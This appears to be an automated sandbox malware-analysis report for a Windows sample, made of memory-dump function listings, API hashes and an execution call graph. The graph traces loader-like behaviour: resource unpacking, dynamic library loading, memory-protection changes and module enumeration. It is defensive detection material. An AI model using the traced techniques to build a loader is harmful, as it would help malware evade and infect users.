                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3990497365-0
                                                                                                                        • Opcode ID: c4b48a56388fa6c30ba392c66f626951cac5a9b14af4f8f58c3c03c011db22c7
                                                                                                                        • Instruction ID: 618edd39e4a67473c28b9b562510509ad4dc0dd3d9fbd88209c7bfd56c68cdf6
                                                                                                                        • Opcode Fuzzy Hash: c4b48a56388fa6c30ba392c66f626951cac5a9b14af4f8f58c3c03c011db22c7
                                                                                                                        • Instruction Fuzzy Hash: 18413B70A4025C9BDB21EF68CD84BDAB7FDAB58300F6044E9A548E7251DB749F84CF52
                                                                                                                        Function 029C1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 42e0489ae0c1fd0d2457d05f4b611cc37093b966f75cdeecdc02d808c782d975
                                                                                                                        • Instruction ID: c9cecac56d3fbc638a3c9e6efb5e58f9055814ec7e9f23631cb1b1ef5a4293c9
                                                                                                                        • Opcode Fuzzy Hash: 42e0489ae0c1fd0d2457d05f4b611cc37093b966f75cdeecdc02d808c782d975
                                                                                                                        • Instruction Fuzzy Hash: 4CA118A67106004BE718AA7C9D943BDB3C6DFC4325F38427EE51DCB383EB64C952865A
                                                                                                                        Function 029C9474 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,029C9562), ref: 029C94FA
                                                                                                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,029C9562), ref: 029C9500
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DateFormatLocaleThread
                                                                                                                        • String ID: yyyy
                                                                                                                        • API String ID: 3303714858-3145165042
                                                                                                                        • Opcode ID: 37310d537d76134e2c058dd6119b9846978c87b7b3591307ace404c6ca3f202c
                                                                                                                        • Instruction ID: a7b4c03e49481a3d70351b967996d5c0a2779b54c3cfef2082a6e26837a4fd42
                                                                                                                        • Opcode Fuzzy Hash: 37310d537d76134e2c058dd6119b9846978c87b7b3591307ace404c6ca3f202c
                                                                                                                        • Instruction Fuzzy Hash: B9218075A042589FEB10DF94C891AFEB3B9EF88710F6100A9ED05E7240D6309E00CBA6
                                                                                                                        Function 029D818C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029D8216), ref: 029D81F8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                        • String ID: FlushInstructionCache$Kernel32
                                                                                                                        • API String ID: 3811539418-184458249
                                                                                                                        • Opcode ID: 9d5673e32d4e30486394be3025fc023c3b2fa5adcac068dc249fa21b3a2292b8
                                                                                                                        • Instruction ID: f3c01c287deeb22c909c6a8cfd1e6b4611ac758173cc45a41538fbcf2c5eb747
                                                                                                                        • Opcode Fuzzy Hash: 9d5673e32d4e30486394be3025fc023c3b2fa5adcac068dc249fa21b3a2292b8
                                                                                                                        • Instruction Fuzzy Hash: 9A018B35740344AFEB10EEA8DC51B5A37AEE788B00FA18464BA04D3A42CA30AD019B25
                                                                                                                        Function 029DAD64 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 029DAD98
                                                                                                                        • IsBadWritePtr.KERNEL32(?,00000004), ref: 029DADC8
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 029DADE7
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 029DADF3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Read$Write
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3448952669-0
                                                                                                                        • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                                                                        • Instruction ID: d6a23cba0673f44f62e30376c104be62a1b827d84efb00cc220cec7cb6427403
                                                                                                                        • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                                                                        • Instruction Fuzzy Hash: 182184B1A403199BDF10DF69CD80BAE77B9EF84362F108515EE5097340EB34D921EAA4

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:12.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:79.6%
                                                                                                                        Signature Coverage:22.7%
                                                                                                                        Total number of Nodes:837
                                                                                                                        Total number of Limit Nodes:53
                                                                                                                        execution_graph 53128 1cf0f250 53130 1cf0f277 53128->53130 53132 1cf0f368 53130->53132 53133 1cf0f3b1 VirtualProtect 53132->53133 53135 1cf0f346 53133->53135 52295 20cac898 52296 20cac8de GetCurrentProcess 52295->52296 52298 20cac929 52296->52298 52299 20cac930 GetCurrentThread 52296->52299 52298->52299 52300 20cac96d GetCurrentProcess 52299->52300 52301 20cac966 52299->52301 52302 20cac9a3 52300->52302 52301->52300 52303 20cac9cb GetCurrentThreadId 52302->52303 52304 20cac9fc 52303->52304 53136 20ca46e8 53137 20ca46f5 53136->53137 53138 20ca46f7 53137->53138 53141 20ca4710 53137->53141 53145 20ca4701 53137->53145 53143 20ca473e 53141->53143 53142 20ca47c9 53142->53142 53143->53142 53149 20ca45bc 53143->53149 53147 20ca470a 53145->53147 53146 20ca47c9 53147->53146 53148 20ca45bc 2 API calls 53147->53148 53148->53146 53151 20ca45c7 53149->53151 53150 20ca7c48 53150->53142 53151->53150 53155 20ca7954 53151->53155 53153 20ca7c0f 53153->53150 53160 20ca77d0 53153->53160 53157 20ca795f 53155->53157 53156 20ca7cd9 53156->53153 53157->53156 53158 20ca8668 GetModuleHandleW 53157->53158 53159 20ca8678 GetModuleHandleW 53157->53159 53158->53156 53159->53156 53161 20cae030 SetTimer 53160->53161 53162 20cae0dd 53161->53162 53162->53150 53163 20cacee8 DuplicateHandle 53164 20cacfc5 53163->53164 53313 20ca9d38 53314 20ca9dd0 CreateWindowExW 53313->53314 53316 20ca9f0e 53314->53316 53316->53316 52291 1cf0f638 52292 1cf0f67c CloseHandle 52291->52292 52294 1cf0f6c8 52292->52294 53317 20cae130 53320 20cae15d 53317->53320 53318 20cae1ac 53318->53318 53320->53318 53321 20cacbd4 53320->53321 53322 20cacbdf 53321->53322 53323 20cacb9c GetCurrentThreadId 53322->53323 53324 20cae30c 53323->53324 53325 20ca45bc 2 API calls 53324->53325 53326 20cae315 53325->53326 53326->53318 53165 1b1bd030 53166 1b1bd048 53165->53166 53169 1b1bd0a2 53166->53169 53175 20ca917c 53166->53175 53186 20caa159 53166->53186 53201 20ca9197 53166->53201 53216 20cadb91 53166->53216 53227 20ca9fd0 53166->53227 53231 20ca9fc0 53166->53231 53235 20cadb70 53166->53235 53176 20ca9187 53175->53176 53177 20cadc01 53176->53177 53179 20cadbf1 53176->53179 53180 20cadbff 53177->53180 53281 20cacb7c 53177->53281 53179->53180 53247 20cadd19 53179->53247 53256 20d96964 53179->53256 53262 20d96888 53179->53262 53267 20d96898 53179->53267 53272 20cadd28 53179->53272 53187 20caa166 53186->53187 53190 20caa1b1 53186->53190 53189 20ca7b2c GetModuleHandleW 53187->53189 53188 20ca7b3c GetModuleHandleW 53191 20caa21f 53188->53191 53189->53190 53190->53188 53190->53191 53192 20cadc01 53191->53192 53194 20cadbf1 53191->53194 53193 20cacb7c 3 API calls 53192->53193 53195 20cadbff 53192->53195 53193->53195 53194->53195 53196 20d96898 3 API calls 53194->53196 53197 20d96888 3 API calls 53194->53197 53198 20cadd28 3 API calls 53194->53198 53199 20cadd19 3 API calls 53194->53199 53200 20d96964 3 API calls 53194->53200 53196->53195 53197->53195 53198->53195 53199->53195 53200->53195 53202 20ca919c 53201->53202 53210 20ca917c 53201->53210 53203 20ca7b2c GetModuleHandleW 53202->53203 53207 20caa1b1 53203->53207 53204 20cadc01 53205 20cacb7c 3 API calls 53204->53205 53208 20cadbff 53204->53208 53205->53208 53206 20cadbf1 53206->53208 53211 20d96898 3 API calls 53206->53211 53212 20d96888 3 API calls 53206->53212 53213 20cadd28 3 API calls 53206->53213 53214 20cadd19 3 API calls 53206->53214 53215 20d96964 3 API calls 53206->53215 53209 20ca7b3c GetModuleHandleW 53207->53209 53207->53210 53209->53210 53210->53204 53210->53206 53211->53208 53212->53208 53213->53208 53214->53208 53215->53208 53217 20cadba0 53216->53217 53218 20cadc01 53217->53218 53220 20cadbf1 53217->53220 53219 20cacb7c 3 API calls 53218->53219 53221 20cadbff 53218->53221 53219->53221 53220->53221 53222 20d96898 3 API calls 53220->53222 53223 20d96888 3 API calls 53220->53223 53224 20cadd28 3 API calls 53220->53224 53225 20cadd19 3 API calls 53220->53225 53226 20d96964 3 API calls 53220->53226 53222->53221 53223->53221 53224->53221 53225->53221 53226->53221 53228 20ca9ff6 53227->53228 53229 20ca917c 3 API calls 53228->53229 53230 20caa017 53229->53230 53230->53169 53232 20ca9ff6 53231->53232 53233 20ca917c 3 API calls 53232->53233 53234 20caa017 53233->53234 53234->53169 53236 20cadb7e 53235->53236 53237 20cadbe0 53235->53237 53236->53169 53238 20cadc01 53237->53238 53239 20cadbf1 53237->53239 53240 20cacb7c 3 API calls 53238->53240 53241 20cadbff 53238->53241 53239->53241 53242 20d96898 3 API calls 53239->53242 53243 20d96888 3 API calls 53239->53243 53244 20cadd28 3 API calls 53239->53244 53245 20cadd19 3 API calls 53239->53245 53246 20d96964 3 API calls 53239->53246 53240->53241 53242->53241 53243->53241 53244->53241 53245->53241 53246->53241 53248 20cadd28 53247->53248 53249 20cadd36 53248->53249 53251 20cadd68 53248->53251 53250 20cadd3e 53249->53250 53253 20cacb7c 3 API calls 53249->53253 53250->53180 53288 20cacb9c 53251->53288 53255 20cadd7c 53253->53255 53254 20cadd74 53254->53180 53255->53180 53257 20d96922 53256->53257 53258 20d96972 53256->53258 53296 20d9694a 53257->53296 53299 20d96950 53257->53299 53259 20d96938 53259->53180 53264 20d968ac 53262->53264 53263 20d96938 53263->53180 53265 20d9694a 3 API calls 53264->53265 53266 20d96950 3 API calls 53264->53266 53265->53263 53266->53263 53269 20d968ac 53267->53269 53268 20d96938 53268->53180 53270 20d9694a 3 API calls 53269->53270 53271 20d96950 3 API calls 53269->53271 53270->53268 53271->53268 53273 20cadd63 53272->53273 53274 20cadd36 53272->53274 53273->53274 53276 20cadd68 53273->53276 53275 20cadd3e 53274->53275 53278 20cacb7c 3 API calls 53274->53278 53275->53180 53277 20cacb9c GetCurrentThreadId 53276->53277 53279 20cadd74 53277->53279 53280 20cadd7c 53278->53280 53279->53180 53280->53180 53282 20cacb87 53281->53282 53283 20cade7c 53282->53283 53284 20caddd2 53282->53284 53286 20ca917c 2 API calls 53283->53286 53285 20cade2a CallWindowProcW 53284->53285 53287 20caddd9 53284->53287 53285->53287 53286->53287 53287->53180 53289 20cacba7 53288->53289 53292 20cacbf4 53289->53292 53291 20cae365 53291->53254 53293 20cacbff 53292->53293 53294 20cae4d1 GetCurrentThreadId 53293->53294 53295 20cae4fb 53293->53295 53294->53295 53295->53291 53297 20d96961 53296->53297 53302 20d97d76 53296->53302 53297->53259 53300 20d96961 53299->53300 53301 20d97d76 3 API calls 53299->53301 53300->53259 53301->53300 53304 20cacb7c 3 API calls 53302->53304 53306 20cadd80 53302->53306 53303 20d97d9a 53303->53297 53304->53303 53307 20cadd90 53306->53307 53308 20cade7c 53307->53308 53309 20caddd2 53307->53309 53311 20ca917c 2 API calls 53308->53311 53310 20cade2a CallWindowProcW 53309->53310 53312 20caddd9 53309->53312 53310->53312 53311->53312 53312->53303 52305 40cbdd 52306 40cbe9 __mtinitlocknum 52305->52306 52349 40d534 HeapCreate 52306->52349 52309 40cc46 52410 41087e 71 API calls 8 library calls 52309->52410 52312 40cc4c 52313 40cc50 52312->52313 52314 40cc58 __RTC_Initialize 52312->52314 52411 40cbb4 62 API calls 3 library calls 52313->52411 52351 411a15 67 API calls 2 library calls 52314->52351 52316 40cc57 52316->52314 52318 40cc66 52319 40cc72 GetCommandLineA 52318->52319 52320 40cc6a 52318->52320 52352 412892 71 API calls 3 library calls 52319->52352 52412 40e79a 62 API calls 3 library calls 52320->52412 52323 40cc71 52323->52319 52324 40cc82 52413 4127d7 107 API calls 3 library calls 52324->52413 52326 40cc8c 52327 40cc90 52326->52327 52328 40cc98 52326->52328 52414 40e79a 62 API calls 3 library calls 52327->52414 52353 41255f 106 API calls 6 library calls 52328->52353 52331 40cc97 52331->52328 52332 40cc9d 52333 40cca1 52332->52333 52334 40cca9 52332->52334 52415 40e79a 62 API calls 3 library calls 52333->52415 52354 40e859 73 API calls 5 library calls 52334->52354 52337 40ccb0 52339 40ccb5 52337->52339 52340 40ccbc 52337->52340 52338 40cca8 52338->52334 52416 40e79a 62 API calls 3 library calls 52339->52416 52355 4019f0 OleInitialize 52340->52355 52343 40ccbb 52343->52340 52344 40ccd8 52345 40ccea 52344->52345 52417 40ea0a 62 API calls _doexit 52344->52417 52418 40ea36 62 API calls _doexit 52345->52418 52348 40ccef __mtinitlocknum 52350 40cc3a 52349->52350 52350->52309 52409 40cbb4 62 API calls 3 library calls 52350->52409 52351->52318 52352->52324 52353->52332 52354->52337 52356 401ab9 52355->52356 52419 40b99e 52356->52419 52358 401abf 52359 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 52358->52359 52389 402467 52358->52389 52360 401dc3 CloseHandle GetModuleHandleA 52359->52360 52368 401c55 52359->52368 52432 401650 52360->52432 52362 401e8b FindResourceA LoadResource LockResource SizeofResource 52434 40b84d 52362->52434 52366 401c9c CloseHandle 52366->52344 52367 401ecb _memset 52369 401efc SizeofResource 52367->52369 52368->52366 52372 401cf9 Module32Next 52368->52372 52370 401f1c 52369->52370 52371 401f5f 52369->52371 52370->52371 52490 401560 __VEC_memcpy __shift 52370->52490 52373 401f92 _memset 52371->52373 52491 401560 __VEC_memcpy __shift 52371->52491 52372->52360 52383 401d0f 52372->52383 52376 401fa2 FreeResource 52373->52376 52377 40b84d _malloc 62 API calls 52376->52377 52378 401fbb SizeofResource 52377->52378 52379 401fe5 _memset 52378->52379 52380 4020aa LoadLibraryA 52379->52380 52381 401650 52380->52381 52382 40216c GetProcAddress 52381->52382 52385 4021aa 52382->52385 52382->52389 52383->52366 52384 401dad Module32Next 52383->52384 52384->52360 52384->52383 52385->52389 52464 4018f0 52385->52464 52387 40243f 52387->52389 52492 40b6b5 62 API calls __mtinitlocknum 52387->52492 52389->52344 52390 4021f1 52390->52387 52476 401870 52390->52476 52392 402269 VariantInit 52393 401870 75 API calls 52392->52393 52394 40228b VariantInit 52393->52394 52395 4022a7 52394->52395 52396 4022d9 SafeArrayCreate SafeArrayAccessData 52395->52396 52481 40b350 52396->52481 52399 40232c 52400 402354 SafeArrayDestroy 52399->52400 52401 40235b 52399->52401 52400->52401 52402 402392 SafeArrayCreateVector 52401->52402 52403 4023a4 52402->52403 52404 4023bc VariantClear VariantClear 52403->52404 52483 4019a0 52404->52483 52407 40242e 52408 4019a0 65 API calls 52407->52408 52408->52387 52409->52309 52410->52312 52411->52316 52412->52323 52413->52326 52414->52331 52415->52338 52416->52343 52417->52345 52418->52348 52422 40b9aa __mtinitlocknum _strnlen 52419->52422 52420 40b9b8 52493 40bfc1 62 API calls __getptd_noexit 52420->52493 52422->52420 52425 40b9ec 52422->52425 52423 40b9bd 52494 40e744 6 API calls 2 library calls 52423->52494 52495 40d6e0 62 API calls 2 library calls 52425->52495 52427 40b9f3 52496 40b917 120 API calls 3 library calls 52427->52496 52429 40b9cd __mtinitlocknum 52429->52358 52430 40b9ff 52497 40ba18 LeaveCriticalSection _doexit 52430->52497 52433 4017cc ___crtGetEnvironmentStringsA 52432->52433 52433->52362 52435 40b900 52434->52435 52445 40b85f 52434->52445 52505 40d2e3 6 API calls __decode_pointer 52435->52505 52437 40b906 52506 40bfc1 62 API calls __getptd_noexit 52437->52506 52442 40b870 52442->52445 52498 40ec4d 62 API calls 2 library calls 52442->52498 52499 40eaa2 62 API calls 7 library calls 52442->52499 52500 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 52442->52500 52443 40b8bc RtlAllocateHeap 52443->52445 52445->52442 52445->52443 52446 40b8ec 52445->52446 52449 40b8f1 52445->52449 52451 401ebf 52445->52451 52501 40b7fe 62 API calls 4 library calls 52445->52501 52502 40d2e3 6 API calls __decode_pointer 52445->52502 52503 40bfc1 62 API calls __getptd_noexit 52446->52503 52504 40bfc1 62 API calls __getptd_noexit 52449->52504 52452 40af66 52451->52452 52454 40af70 52452->52454 52453 40b84d _malloc 62 API calls 52453->52454 52454->52453 52455 40af8a 52454->52455 52459 40af8c std::bad_alloc::bad_alloc 52454->52459 52507 40d2e3 6 API calls __decode_pointer 52454->52507 52455->52367 52457 40afb2 52509 40af49 62 API calls std::exception::exception 52457->52509 52459->52457 52508 40d2bd 73 API calls __cinit 52459->52508 52460 40afbc 52510 40cd39 RaiseException 52460->52510 52463 40afca 52465 401903 lstrlenA 52464->52465 52466 4018fc 52464->52466 52511 4017e0 52465->52511 52466->52390 52469 401940 GetLastError 52471 40194b MultiByteToWideChar 52469->52471 52473 40198d 52469->52473 52470 401996 52470->52390 52472 4017e0 77 API calls 52471->52472 52474 401970 MultiByteToWideChar 52472->52474 52473->52470 52527 401030 GetLastError EntryPoint 52473->52527 52474->52473 52477 40af66 74 API calls 52476->52477 52478 40187c 52477->52478 52479 401885 SysAllocString 52478->52479 52480 4018a4 52478->52480 52479->52480 52480->52392 52482 40231a SafeArrayUnaccessData 52481->52482 52482->52399 52484 4019aa InterlockedDecrement 52483->52484 52489 4019df VariantClear 52483->52489 52485 4019b8 52484->52485 52484->52489 52486 4019c2 SysFreeString 52485->52486 52487 4019c9 52485->52487 52485->52489 52486->52487 52531 40aec0 63 API calls __mtinitlocknum 52487->52531 52489->52407 52490->52370 52491->52373 52492->52389 52493->52423 52495->52427 52496->52430 52497->52429 52498->52442 52499->52442 52501->52445 52502->52445 52503->52449 52504->52451 52505->52437 52506->52451 52507->52454 52508->52457 52509->52460 52510->52463 52512 4017f3 52511->52512 52513 4017e9 EntryPoint 52511->52513 52514 401805 52512->52514 52515 4017fb EntryPoint 52512->52515 52513->52512 52516 401818 52514->52516 52517 40180e EntryPoint 52514->52517 52515->52514 52518 401844 52516->52518 52519 40183e 52516->52519 52528 40b783 72 API calls 5 library calls 52516->52528 52517->52516 52524 40186d MultiByteToWideChar 52518->52524 52525 40184e EntryPoint 52518->52525 52530 40b743 62 API calls 2 library calls 52518->52530 52529 40b6b5 62 API calls __mtinitlocknum 52519->52529 52523 40182d 52523->52518 52526 401834 EntryPoint 52523->52526 52524->52469 52524->52470 52525->52518 52526->52519 52528->52523 52529->52518 52530->52518 52531->52489 52532 1f6eaa30 52533 1f6eaa42 KiUserExceptionDispatcher 52532->52533 52535 1f6eaad3 52533->52535 52653 20a80040 52535->52653 52657 20a80006 52535->52657 52536 1f6eaaef 52661 20a80608 52536->52661 52665 20a805f7 52536->52665 52537 1f6eaaf6 52669 20a8a1c0 52537->52669 52673 20a8a1d0 52537->52673 52538 1f6eaafd 52677 20a8a788 52538->52677 52681 20a8a798 52538->52681 52539 1f6eab04 52685 20a8ad60 52539->52685 52689 20a8ad52 52539->52689 52540 1f6eab0b 52693 20a8b328 52540->52693 52697 20a8b318 52540->52697 52541 1f6eab12 52701 20a8b8f0 52541->52701 52705 20a8b8e2 52541->52705 52542 1f6eab19 52709 20a8bea8 52542->52709 52713 20a8beb8 52542->52713 52543 1f6eab20 52717 20a8c480 52543->52717 52721 20a8c470 52543->52721 52544 1f6eab27 52725 20a8ca38 52544->52725 52729 20a8ca48 52544->52729 52545 1f6eab2e 52733 20a8d010 52545->52733 52737 20a8d001 52545->52737 52546 1f6eab35 52741 20a8d5c8 52546->52741 52745 20a8d5d8 52546->52745 52547 1f6eab3c 52749 20a8dba0 52547->52749 52753 20a8db91 52547->52753 52548 1f6eab43 52757 20a8e168 52548->52757 52761 20a8e158 52548->52761 52549 1f6eab4a 52765 20a8e730 52549->52765 52769 20a8e721 52549->52769 52550 1f6eab51 52773 20a8ece8 52550->52773 52777 20a8ecf8 52550->52777 52551 1f6eab58 52781 20a8f2b0 52551->52781 52785 20a8f2c0 52551->52785 52552 1f6eab5f 52789 20a8f878 52552->52789 52793 20a8f888 52552->52793 52553 1f6eab66 52797 20aa0012 52553->52797 52801 20aa0040 52553->52801 52554 1f6eab6d 52805 20aa0608 52554->52805 52809 20aa05f9 52554->52809 52555 1f6eab74 52813 20aa0bc0 52555->52813 52817 20aa0bd0 52555->52817 52556 1f6eab7b 52821 20aa1188 52556->52821 52825 20aa1198 52556->52825 52557 1f6eab82 52829 20aa1760 52557->52829 52833 20aa1750 52557->52833 52558 1f6eab89 52837 20aa7120 52558->52837 52841 20aa7111 52558->52841 52559 1f6eabb6 52845 20aa7710 52559->52845 52849 20aa7702 52559->52849 52560 1f6eabc4 52853 20aa7cc8 52560->52853 52857 20aa7cd8 52560->52857 52561 1f6eabcb 52861 20aa82a0 52561->52861 52865 20aa8290 52561->52865 52562 1f6eabd2 52869 20aa8868 52562->52869 52873 20aa8859 52562->52873 52563 1f6eabd9 52877 20aa8e20 52563->52877 52881 20aa8e30 52563->52881 52564 1f6eabe0 52885 20aa93f8 52564->52885 52889 20aa93e9 52564->52889 52565 1f6eabe7 52893 20aa99e8 52565->52893 52897 20aa99d9 52565->52897 52566 1f6eabf5 52901 20aa9fa8 52566->52901 52905 20aa9fb8 52566->52905 52567 1f6eabfc 52909 20aaa580 52567->52909 52913 20aaa570 52567->52913 52568 1f6eac03 52917 20aaab39 52568->52917 52921 20aaab48 52568->52921 52569 1f6eac0a 52925 20aab110 52569->52925 52929 20aab100 52569->52929 52570 1f6eac11 52933 20aab6d8 52570->52933 52937 20aab6c8 52570->52937 52571 1f6eac18 52941 20aabca0 52571->52941 52945 20aabc90 52571->52945 52572 1f6eac1f 52949 20aac259 52572->52949 52953 20aac268 52572->52953 52573 1f6eac26 52957 20caed30 52573->52957 52961 20caed22 52573->52961 52654 20a80062 52653->52654 52966 1f6ee660 52654->52966 52655 20a80158 52655->52536 52658 20a80062 52657->52658 52660 1f6ee660 LdrInitializeThunk 52658->52660 52659 20a80158 52659->52536 52660->52659 52662 20a8062a 52661->52662 52664 1f6ee660 LdrInitializeThunk 52662->52664 52663 20a80720 52663->52537 52664->52663 52666 20a8062a 52665->52666 52668 1f6ee660 LdrInitializeThunk 52666->52668 52667 20a80720 52667->52537 52668->52667 52670 20a8a1f2 52669->52670 52672 1f6ee660 LdrInitializeThunk 52670->52672 52671 20a8a2e8 52671->52538 52672->52671 52674 20a8a1f2 52673->52674 52676 1f6ee660 LdrInitializeThunk 52674->52676 52675 20a8a2e8 52675->52538 52676->52675 52678 20a8a73c 52677->52678 52678->52677 52680 1f6ee660 LdrInitializeThunk 52678->52680 52679 20a8a8b0 52679->52539 52680->52679 52682 20a8a7ba 52681->52682 52684 1f6ee660 LdrInitializeThunk 52682->52684 52683 20a8a8b0 52683->52539 52684->52683 52686 20a8ad82 52685->52686 52688 1f6ee660 LdrInitializeThunk 52686->52688 52687 20a8ae78 52687->52540 52688->52687 52690 20a8ad04 52689->52690 52690->52689 52692 1f6ee660 LdrInitializeThunk 52690->52692 52691 20a8ae78 52691->52540 52692->52691 52694 20a8b34a 52693->52694 52696 1f6ee660 LdrInitializeThunk 52694->52696 52695 20a8b440 52695->52541 52696->52695 52698 20a8b34a 52697->52698 52700 1f6ee660 LdrInitializeThunk 52698->52700 52699 20a8b440 52699->52541 52700->52699 52702 20a8b912 52701->52702 52704 1f6ee660 LdrInitializeThunk 52702->52704 52703 20a8ba08 52703->52542 52704->52703 52706 20a8b912 52705->52706 52708 1f6ee660 LdrInitializeThunk 52706->52708 52707 20a8ba08 52707->52542 